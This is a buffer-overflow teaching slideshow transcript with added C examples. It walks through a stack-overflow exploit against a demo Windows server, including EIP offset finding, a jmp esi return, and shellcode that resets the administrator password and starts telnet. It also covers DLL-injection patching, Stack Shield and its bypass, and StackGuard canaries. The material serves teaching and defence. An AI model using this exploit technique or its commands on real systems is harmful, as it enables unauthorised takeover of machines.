Buffer Overflow

  • Published on
    11-Jan-2016

DESCRIPTION

Buffer Overflow (BOF) - PowerPoint PPT Presentation

Transcript

  • Buffer Overflow (BOF)

  • What is a buffer overflow? A program writes more data into a buffer than the buffer was sized to hold, and the excess spills over whatever lies next to it in memory. In C the classic sources are the unchecked string functions: strcpy, strcat, gets and their relatives, none of which know how large the destination is.

  • Demo: a buffer overflow in a network server is used to gain administrator access and start telnet on the machine. A patch for the running server is then shown, in two variants:

  • Server.exe

    The server opens a socket, receives whatever the client sends from the socket into a buffer, and copies that buffer with strcpy into a smaller local buffer without checking its length (the BUG).

  • Bad_client.exe

    The malicious client sends a buffer larger than the server's local buffer. The extra bytes overwrite the server's stack and carry the code that starts telnet.

  • The buffer in the server (the receive happens in main, the copy in copyBuf):

        recv( m_socket, recvbuf, 1000, 0 );   // recvbuf : buffer received from the client, size : 1000
        copyBuf(recvbuf);

        copyBuf(char *arr)
        {
            char myArr[500];                  // myArr : a local variable in the server, size : 500
            strcpy(myArr, arr);               // Oops: up to 1000 bytes copied into 500
        }

  • The overflow overwrites the saved return address of copyBuf, so when the function returns, EIP is loaded from our data. Which bytes of our buffer land in EIP? Send a recognisable pattern such as aaabbbccccdddde and read EIP when the server crashes. How does that turn into an exploit? (Make EIP point back into the buffer.)

  • Finding the offset:

    Fill the buffer with 'a' characters (aaa...aaa). The server crashes with EIP = 0x61616161, since 'a' is 0x61 in ASCII. Then replace parts of the pattern with abcd (a = 0x61, b = 0x62, c = 0x63, d = 0x64) and narrow down, from the value that appears in EIP, which four bytes of the buffer sit on top of the return address.

  • Once the offset is known we control EIP. The goal is to make EIP point into our own buffer, where we place the code we want the server to run.
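    The offset search described above, as an added example (my code, not the slides' client): instead of repeated rounds of aaabbbccccdddde guessing, the client sends a cyclic pattern in which every 4-byte window is unique, so the single value that shows up in EIP identifies the exact offset. The crash itself is simulated; the 504-byte offset (500-byte myArr plus saved EBP) is a constructed figure, not one measured on the slides' server.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define PATTERN_LEN 1000   /* same size as recvbuf in the server */

/* Fill out[] with the cyclic pattern Aa0Aa1Aa2...Ab0...; every 4-byte window
 * is unique for the first 20280 bytes. Returns the number of bytes written. */
size_t make_pattern(char *out, size_t len) {
    const char *up = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    const char *lo = "abcdefghijklmnopqrstuvwxyz";
    const char *dg = "0123456789";
    size_t n = 0;
    for (int i = 0; i < 26 && n < len; i++)
        for (int j = 0; j < 26 && n < len; j++)
            for (int k = 0; k < 10 && n < len; k++) {
                char trip[3] = { up[i], lo[j], dg[k] };
                for (int m = 0; m < 3 && n < len; m++)
                    out[n++] = trip[m];
            }
    return n;
}

/* Map the 32-bit value read from EIP after the crash back to an offset in
 * the pattern. x86 is little-endian, so the bytes appear reversed in the
 * register: "Aa0A" in memory shows up as EIP = 0x41306141. Returns -1 when
 * the value is not from the pattern (EIP was not overwritten by our data). */
long pattern_offset(const char *pat, size_t len, uint32_t eip) {
    unsigned char needle[4] = {
        (unsigned char)(eip & 0xff), (unsigned char)((eip >> 8) & 0xff),
        (unsigned char)((eip >> 16) & 0xff), (unsigned char)((eip >> 24) & 0xff)
    };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Stand-in for the crash: read the 4 pattern bytes that would overwrite the
 * saved return address at ret_off, as the CPU would load them into EIP. */
uint32_t simulate_crash_eip(const char *pat, size_t ret_off) {
    const unsigned char *p = (const unsigned char *)pat + ret_off;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* One round of the technique: send the pattern, read EIP, compute offset. */
long offset_for_eip(uint32_t eip) {
    char pat[PATTERN_LEN];
    size_t n = make_pattern(pat, sizeof pat);
    return pattern_offset(pat, n, eip);
}

/* EIP the simulated server would crash with (constructed 504-byte offset). */
uint32_t demo_crash_eip(void) {
    char pat[PATTERN_LEN];
    make_pattern(pat, sizeof pat);
    return simulate_crash_eip(pat, 504);
}

int main(void) {
    uint32_t eip = demo_crash_eip();
    printf("crash EIP = 0x%08x -> return address at offset %ld\n",
           eip, offset_for_eip(eip));
    return 0;
}
```

    The -1 case matters in practice: an EIP such as 0x41414141 never occurs in this pattern (no two uppercase letters are adjacent), so a value not found tells you the register was not loaded from your data at all.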

  • Layout of the malicious buffer:

  • Buffer (filler) | 0x77E64167 (overwrites the return address) | EVIL CODE

  • Problem: which value do we put into EIP? The buffer lives on the stack and its address is not known in advance, so we look for a register that happens to point near it at the moment of the overflow. In the server, esi holds 0x0012f5a8 at that point.

    The buffer itself spans 0x0012f3a8 to 0x0012f59c. A further constraint: the value we write cannot contain a 0x00 byte (null), because strcpy stops at the first null, so nothing after it would be copied. The same applies to every byte of the code we send.

  • How do we get execution to where esi points? Instead of guessing the buffer's address, return into a jmp esi instruction (opcode FF E6) somewhere in the server's address space. Where is one? In a DLL loaded by the server: system DLLs such as kernel32.dll are mapped at a fixed base address on this system, so the address of a jmp esi found in one of them stays the same from run to run.

  • Our code goes into the buffer as raw opcodes, placed right after the overwritten return address, which is where esi points.

  • What should the payload do? In C it would be:

        system("net user administrator pupp");   // set the administrator password to pupp
        system("net start telnet");              // start the telnet service

    After that the attacker can telnet in as administrator. The slides build the equivalent by hand in assembly, one step per slide:

  • How do we write this as machine code?

  • The shellcode, step by step (each slide shows the stack with ebp at the top and esp at the bottom).

    Way of creating a null (\0) without a 0x00 byte appearing in the code:

        xor edi, edi
        push edi                        ; [ebp-4] = \0

  • Making room in the stack for our string and entering the string into the stack, one byte at a time:

        sub esp, 18h
        mov byte ptr [ebp-1Ch], 6Eh     ; 'n'
        mov byte ptr [ebp-1Bh], 65h     ; 'e'
        mov byte ptr [ebp-1Ah], 74h     ; 't'
        ...                             ; the rest of "net user administrator pupp"

  • The same for the second string, "net start telnet". The stack now holds, from ebp downwards: \0, "net user administrator pupp", \0, "net start telnet", with esp below them.

  • Pushing the address of the function system on XP:

        mov eax, 0x77bb8c10             ; address of system on this XP machine
        push eax

  • Calling the system function with the first string:

        lea edx, [ebp-1Ch]              ; edx = address of the 'n' of "net user administrator pupp"
        push edx
        call dword ptr [ebp-34h]        ; [ebp-34h] holds the address of system

  • The same with the second string:

        add esp, 4                      ; discard the previous argument
        lea edx, [ebp-30h]              ; edx = address of the 'n' of "net start telnet"
        push edx
        call dword ptr [ebp-34h]
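    How those mov byte ptr stores are produced without a 0x00 byte, as an added example (my code, not from the slides): each character becomes a "mov byte ptr [ebp+disp8], imm8" (encoded C6 45 disp8 imm8), the terminator comes from xor edi,edi / push edi (33 FF 57), and a scan checks the result for bytes that would stop strcpy. The strings and displacements are the slides' own; the encoder and the bad-byte check are mine.

```c
#include <stdio.h>
#include <stddef.h>

/* mov byte ptr [ebp+disp8], imm8  ->  C6 45 <disp8> <imm8> */
static size_t emit_mov_byte_ebp(unsigned char *out, int disp, unsigned char imm) {
    out[0] = 0xC6;
    out[1] = 0x45;                       /* ModRM: [ebp + disp8], /0 */
    out[2] = (unsigned char)disp;        /* two's complement, e.g. -0x1C -> E4 */
    out[3] = imm;
    return 4;
}

/* xor edi,edi ; push edi  ->  33 FF 57 : a 4-byte zero on the stack, no 0x00 opcode */
size_t emit_push_null(unsigned char *out) {
    out[0] = 0x33; out[1] = 0xFF; out[2] = 0x57;
    return 3;
}

/* Store s starting at [ebp+first_disp]; returns the opcode bytes written.
 * A displacement that reaches 0 (or a character that is 0) produces a 0x00
 * byte, so the caller must check the output with find_bad_byte(). */
size_t emit_string_stores(unsigned char *out, const char *s, int first_disp) {
    size_t n = 0;
    for (size_t i = 0; s[i] != '\0'; i++)
        n += emit_mov_byte_ebp(out + n, first_disp + (int)i, (unsigned char)s[i]);
    return n;
}

/* Index of the first byte of code[] that appears in bad[], or -1. */
long find_bad_byte(const unsigned char *code, size_t n,
                   const unsigned char *bad, size_t nbad) {
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nbad; j++)
            if (code[i] == bad[j])
                return (long)i;
    return -1;
}

/* The first string exactly as the slides lay it out: push a zero at [ebp-4],
 * then "net user administrator pupp" from [ebp-1Ch] upward, so its last
 * character lands at [ebp-2] and the byte of the pushed zero left at [ebp-1]
 * terminates it. Returns the total opcode length. */
size_t build_first_string(unsigned char *out) {
    size_t n = emit_push_null(out);
    n += emit_string_stores(out + n, "net user administrator pupp", -0x1C);
    return n;
}

size_t first_string_len(void) {
    unsigned char code[512];
    return build_first_string(code);
}

/* Where the first 0x00 would be if string s were stored from first_disp. */
long first_null_for(const char *s, int first_disp) {
    unsigned char code[512];
    const unsigned char bad[] = { 0x00 };   /* strcpy stops here */
    size_t n = emit_string_stores(code, s, first_disp);
    return find_bad_byte(code, n, bad, 1);
}

int main(void) {
    unsigned char code[512];
    const unsigned char bad[] = { 0x00 };
    size_t n = build_first_string(code);
    printf("%zu opcode bytes, first null at %ld\n", n, find_bad_byte(code, n, bad, 1));
    for (size_t i = 0; i < n; i++)
        printf("%02X%c", code[i], (i % 16 == 15) ? '\n' : ' ');
    printf("\n");
    return 0;
}
```

    first_null_for("abc", -2) shows the trap: the third store would be at [ebp+0], whose disp8 is 0x00, and strcpy in the server would truncate the payload there. Start displacements must be chosen so that no store reaches offset 0.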

  • Getting the opcodes: write the assembly inside a small C program and read the bytes off in the debugger.

        #include <windows.h>

        int main(void)
        {
            LoadLibrary("msvcrt.dll");   // so that system() is mapped at the address used above
            __asm {
                push ebp
                mov ebp, esp
                ...                      // our code
            }
            return 0;
        }

    Step through it in the debugger (Ctrl+F11 opens the disassembly, which shows the opcodes), copy the opcode bytes and paste them into the client's buffer. The DLL addresses used must be those of the machine the server runs on.

  • The patch: rather than fixing the server's source, a patch program injects a DLL into the running server and hooks the call to strcpy. The DLL contains CheckProc, which checks the length before copying, and a procedure that rewrites the server's call strcpy into call CheckProc. Two ways of getting the DLL into the server are shown: Windows hooks and CreateRemoteThread.

  • Files: server.exe, good_client.exe / bad_client.exe, Patch.exe, fix.dll (and fix2.dll).
    fix.dll: CheckProc replaces strcpy; HookProc is the hook procedure that, once it runs inside the server, patches the call to strcpy into a call to CheckProc.
    fix2.dll: the same CheckProc, but the patching is done from DllMain, because the DLL enters the server through CreateRemoteThread rather than through a hook.

  • Hooks (Win OS): Windows hooks let a program intercept events (messages, keyboard input and so on) in other processes. To run the hook procedure inside another process, Windows loads the DLL that contains it into that process. That is exactly the injection we need.

  • Hooks (Win OS)

    WH_CBT is a hook type triggered by window events such as creation and activation, which makes it easy to fire from the outside.

    hFixDll: the handle of the DLL containing the hook procedure (the DLL that calls Set...).

    addrHookProc: the address of the hook procedure inside that DLL.

    0: a thread id of 0 means all threads in the system (we do not need to know the server's thread id):

        SetWindowsHookEx(WH_CBT, addrHookProc, hFixDll, 0)

  • The flow:
    1. Run the server.
    2. The server shows a MessageBox.
    3. The patch installs the hook for an event in the server.
    4. The hook DLL is loaded into the server.
    5. HookProc runs inside the server.
    6. The MessageBox is closed.
    7. The hook and the DLL are now in the server.
    8. HookProc patches the server and signals the patch, through an event, that the server has been patched.
    9. The patch unhooks.

  • Patching the server's code:
    1. CheckProc in fix.dll takes the same arguments as strcpy, checks that the source fits in the destination buffer, and only then copies (otherwise it rejects the input).
    2. Find the address of the server's call strcpy instruction with a debugger.
    3. Alternatively, find strcpy's address at runtime with GetProcAddress (or from the map file / DropBin) and search the server's code for the call to it.
    4. Replace the call strcpy with call CheckProc.

  • The rewrite itself, done by HookProc from inside the server:
    1. Make the code page writable (VirtualProtect).
    2. Overwrite the call's target so that it becomes call CheckProc.
    3. Restore the original page protection (VirtualProtect).
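    The two halves of that patch in portable C, as an added example (my code, not the fix.dll from the slides): check_proc() is the strcpy stand-in that refuses input that does not fit the server's 500-byte myArr, and patch_call() does step 2 of the rewrite. An x86 near call is E8 followed by a 32-bit displacement relative to the next instruction, so retargeting it means recomputing that displacement. The code fragment and the addresses of strcpy and CheckProc are constructed for the demo; the real patch does the same write in the live server between the two VirtualProtect calls.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define MYARR_SIZE 500

/* Replacement for strcpy(myArr, arr). Returns 1 if copied, 0 if refused. */
int check_proc(char *dst, size_t dst_size, const char *src) {
    size_t n = strlen(src);
    if (n >= dst_size)           /* must leave room for the terminator */
        return 0;
    memcpy(dst, src, n + 1);
    return 1;
}

/* Absolute target of the call at code[off], given the address of code[0]. */
uint32_t call_target(const unsigned char *code, size_t off, uint32_t code_base) {
    int32_t rel;
    memcpy(&rel, code + off + 1, sizeof rel);            /* little-endian imm32 */
    return code_base + (uint32_t)off + 5 + (uint32_t)rel;
}

/* Retarget the E8 call at code[off] to new_target. Returns 0 if there is no
 * E8 opcode at off (patching the wrong bytes would corrupt the server). */
int patch_call(unsigned char *code, size_t off, uint32_t code_base, uint32_t new_target) {
    if (code[off] != 0xE8)
        return 0;
    int32_t rel = (int32_t)(new_target - (code_base + (uint32_t)off + 5));
    memcpy(code + off + 1, &rel, sizeof rel);
    return 1;
}

/* Constructed fragment of copyBuf: push arr; push myArr; call strcpy; add esp,8 */
#define CODE_BASE   0x00401000u   /* where the fragment is mapped (constructed) */
#define STRCPY_ADDR 0x77C47A90u   /* strcpy in the C runtime (constructed) */
#define CHECK_ADDR  0x10001020u   /* CheckProc inside fix.dll (constructed) */
#define CALL_OFF    2             /* offset of the E8 byte in the fragment */

static size_t build_fragment(unsigned char *code) {
    static const unsigned char tmpl[] = {
        0x52,                         /* push edx   (arr) */
        0x51,                         /* push ecx   (myArr) */
        0xE8, 0, 0, 0, 0,             /* call rel32 (filled in below) */
        0x83, 0xC4, 0x08              /* add esp, 8 */
    };
    memcpy(code, tmpl, sizeof tmpl);
    patch_call(code, CALL_OFF, CODE_BASE, STRCPY_ADDR);   /* as the linker left it */
    return sizeof tmpl;
}

uint32_t target_before_patch(void) {
    unsigned char code[16];
    build_fragment(code);
    return call_target(code, CALL_OFF, CODE_BASE);
}

uint32_t target_after_patch(void) {
    unsigned char code[16];
    build_fragment(code);
    patch_call(code, CALL_OFF, CODE_BASE, CHECK_ADDR);     /* HookProc's step 2 */
    return call_target(code, CALL_OFF, CODE_BASE);
}

/* patch_call must refuse an offset that does not hold an E8 opcode. */
int patch_refuses_wrong_offset(void) {
    unsigned char code[16];
    build_fragment(code);
    return patch_call(code, 0, CODE_BASE, CHECK_ADDR) == 0;   /* code[0] is push edx */
}

/* Feed check_proc a string of len 'A's aimed at myArr; 1 = accepted. */
int check_proc_accepts(size_t len) {
    char src[1001], myArr[MYARR_SIZE];
    if (len > 1000) len = 1000;          /* recvbuf is 1000 bytes */
    memset(src, 'A', len);
    src[len] = '\0';
    return check_proc(myArr, sizeof myArr, src);
}

int main(void) {
    printf("call target before: 0x%08x  after: 0x%08x\n",
           target_before_patch(), target_after_patch());
    printf("499 bytes: %d, 500 bytes: %d, 999 bytes: %d\n",
           check_proc_accepts(499), check_proc_accepts(500), check_proc_accepts(999));
    return 0;
}
```

    Note the boundary: 499 bytes plus the terminator fill myArr exactly and are accepted, 500 bytes are refused, because strcpy would write the terminator one byte past the end.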

  • Demo code using Hooks

  • Method 2: CreateRemoteThread, the technique debuggers also use. Idea: if the server itself calls LoadLibrary on our DLL, DllMain runs inside the server and can do what HookProc did. CreateRemoteThread starts a thread in another process at a function of our choice, and LoadLibrary has a shape compatible with a thread function:

        HINSTANCE WINAPI LoadLibrary(PCTSTR pszLibFile)
        DWORD WINAPI ThreadFunc(PVOID pvParam)

    so the naive call would be

        CreateRemoteThread(hProcessRemote, NULL, 0, LoadLibraryA, "c:\\fix.dll", 0, NULL) ...

  • Method 2: CreateRemoteThread - the catches. The address passed as the thread function must be valid in the remote process; kernel32 is mapped at the same address in every process, so GetProcAddress(GetModuleHandle("kernel32"), "LoadLibraryA") gives an address that is also correct in the server. The string "c:\\fix.dll", however, lives in our process: LoadLibraryA("c:\\fix.dll") executed in the server would read garbage at that address. The path has to be placed in the server's memory first, with VirtualAlloc's remote counterpart.

    The steps:

  • Method 2: CreateRemoteThread - VirtualAllocEx allocates memory in the server for the DLL path; WriteProcessMemory writes the path there; the address of LoadLibraryA (LoadLibraryW for a Unicode path) is obtained as above; CreateRemoteThread is called with LoadLibraryA as the thread function and the remote buffer as its argument. Steps 2 and 3 lead to DllMain, and DllMain does what HookProc did in the hooks version. Note: no hooks are involved. WaitForSingleObject waits for the remote thread to finish.

  • Demo code using CreateRemoteThread

  • DLL injection into the server - ways of getting a DLL in: 1. hooks 2. CreateRemoteThread 3. the registry 4. a substitute DLL 5. Windows 98 specific methods

  • DLL injection via the registry: a registry value lists DLLs that Windows loads into every process that loads User32.dll. Put our DLL there and it ends up in the server as well.

    Disadvantages: the DLL cannot be unmapped afterwards, and only GUI processes (those that load User32.dll) get it.

  • DLL injection via a substitute DLL: replace a DLL the server already loads with one of our own.

    Disadvantage: the substitute has to stand in for everything the original DLL provided.

  • DLL injection on Windows 98: the patch cannot use CreateRemoteThread there. Alternatives: run as a debugger of the server, or use a memory-mapped file (MapViewOfFile) placed in the region above 2GB, which Win98 shares between all processes at the same address.

  • Windows 98 (2): since Win98 has no CreateRemoteThread, the DLL has to be brought into the server by one of those other routes.

  • Defending against BOF: 1. the patch 2. Stack Shield 3. StackGuard

  • Defence 1: the patch. It needs VirtualProtect to write into the code section (TEXT), it covers only strcpy, and it needs a WatchDog to keep it in place (again via VirtualProtect).

  • Defence 1 (cont.): the general idea behind the compiler-based protections that follow is to check the return address before ret, against information kept somewhere the overflow cannot reach, rather than trusting what sits on the stack near esp.


  • Defence 2: Stack Shield. The compiler adds code that saves a copy of the return address in a separate area at function entry and compares it with the return address on the stack before ret. A BOF that overwrites the return address is detected; a BOF that does not touch it is not.


  • Defence 2 (cont.): getting around Stack Shield. Take a function with two buffers, S1 and S2, and two pointers: p1, used for the strcpy into S1, and p2, used for the copy into S2.

    The attack: overflow S1 so that p2 is overwritten with an address of our choice. The following copy through p2 then writes wherever we pointed it, the saved copy of the return address is never involved, and nothing is detected!

  • Defence 3: StackGuard

  • Defence 3 (cont.): a "canary" value is placed between the local buffers and the return address. On return the canary is checked; a changed canary means the buffer overflowed past it, and the function aborts instead of returning.

    Weakness: an attacker who knows the canary value can write it back in its place as part of the overflow ("spoofing").

  • Defence 3 (cont.), two kinds of canary:
    1. Terminator canary, made of the four bytes NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff): the string functions stop at these characters, so a strcpy cannot write the canary back intact and reach the return address beyond it.
    2. Random canary: a value the attacker cannot know in advance (random, or a hash computed at start-up).

  • Stack layout with StackGuard: P1 | P2 | canary | Return address

  • Defence 3 (cont.): a stronger variant XORs the random canary with the return address, so that the check also fails when the return address alone is changed, and spoofing requires knowing both values.
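    The canary check and the spoofing weakness from the slides above, as an added example (my code, not StackGuard's): a 40-byte frame laid out as on the diagram (P1 | P2 | canary | return address) is filled by a strcpy-like copy, and the epilogue check runs afterwards. Three constructed attacker inputs show a blind smash being caught, a known random canary being written back in place, and the terminator canary stopping the copy before the return address. The canary values and addresses are constructed; the copy is clamped at the frame boundary only to keep the demo within its own memory.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define P1_OFF      0
#define P2_OFF      16
#define CANARY_OFF  32
#define RET_OFF     36
#define FRAME_SIZE  40

#define TERMINATOR_CANARY 0x000AFF0Du   /* in memory: 0D FF 0A 00 = CR EOF LF NUL */
#define RANDOM_CANARY     0x2F8A3C51u   /* constructed stand-in for a per-run random value */
#define ORIG_RET          0x00401234u   /* constructed saved return address */

/* strcpy as the server uses it: copies until the first NUL, then writes the
 * NUL. Clamped at the frame end only so that the demo stays in bounds. */
static void emulated_strcpy(unsigned char *frame, size_t dst_off, const unsigned char *src) {
    size_t i = 0;
    while (src[i] != 0 && dst_off + i < FRAME_SIZE) {
        frame[dst_off + i] = src[i];
        i++;
    }
    if (dst_off + i < FRAME_SIZE)
        frame[dst_off + i] = 0;
}

/* One strcpy(P1, payload) into a fresh frame guarded by `canary`.
 * Returns bit 1 set if the epilogue check failed (overflow detected) and
 * bit 0 set if the saved return address was changed. */
int run_frame(const unsigned char *payload, uint32_t canary) {
    unsigned char frame[FRAME_SIZE];
    uint32_t ret_orig = ORIG_RET, canary_after, ret_after;
    memset(frame, 0, sizeof frame);
    memcpy(frame + CANARY_OFF, &canary, 4);      /* prologue plants the canary */
    memcpy(frame + RET_OFF, &ret_orig, 4);
    emulated_strcpy(frame, P1_OFF, payload);     /* the vulnerable copy */
    memcpy(&canary_after, frame + CANARY_OFF, 4); /* epilogue re-reads it */
    memcpy(&ret_after, frame + RET_OFF, 4);
    return ((canary_after != canary) ? 2 : 0) | ((ret_after != ret_orig) ? 1 : 0);
}

static unsigned char g_payload[64];   /* constructed attacker inputs */

/* 40 'A's: smashes P1, P2, the canary and the return address alike. */
const unsigned char *payload_blind(void) {
    memset(g_payload, 'A', 40);
    g_payload[40] = 0;
    return g_payload;
}

/* 32 'A's, then the canary written back where it was, then a new return
 * address: "spoofing", which needs the value and needs it to be NUL-free. */
const unsigned char *payload_spoof(uint32_t canary) {
    uint32_t evil_ret = 0xDEADBEEFu;
    memset(g_payload, 'A', 32);
    memcpy(g_payload + 32, &canary, 4);
    memcpy(g_payload + 36, &evil_ret, 4);
    g_payload[40] = 0;
    return g_payload;
}

int demo_blind_random(void)     { return run_frame(payload_blind(), RANDOM_CANARY); }
int demo_spoof_random(void)     { return run_frame(payload_spoof(RANDOM_CANARY), RANDOM_CANARY); }
int demo_spoof_terminator(void) { return run_frame(payload_spoof(TERMINATOR_CANARY), TERMINATOR_CANARY); }

int main(void) {
    printf("blind smash, random canary : detected=%d ret changed=%d\n",
           demo_blind_random() >> 1, demo_blind_random() & 1);
    printf("spoof, known random canary : detected=%d ret changed=%d\n",
           demo_spoof_random() >> 1, demo_spoof_random() & 1);
    printf("spoof, terminator canary   : detected=%d ret changed=%d\n",
           demo_spoof_terminator() >> 1, demo_spoof_terminator() & 1);
    return 0;
}
```

    The terminator case is the interesting one: the copy stops at the 0x00 inside the canary, so the check passes, but the return address was never reached; the defence works by making the payload unwritable rather than by detecting it. A random canary only holds as long as its value stays secret.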

  • Buffer Overflow - how common is it? CERT data on the share of reported vulnerabilities that are buffer overruns, by year (from the source below):

    Year   Total vulnerabilities   Percentage that are buffer overruns
    1988     10                     0%
    1989     51                    20%
    1990     70                     0%
    1991    202                    10%
    1992    141                     7%
    1993    150                     0%
    1994    132                    15%
    1995    133                    23%
    1996    273                    11%
    1997   2815                    54%
    1998    137                    54%
    1999    115                    45%

  • http://www.rocklinux.net/people/clifford/BufferOverflow/p56-5.txt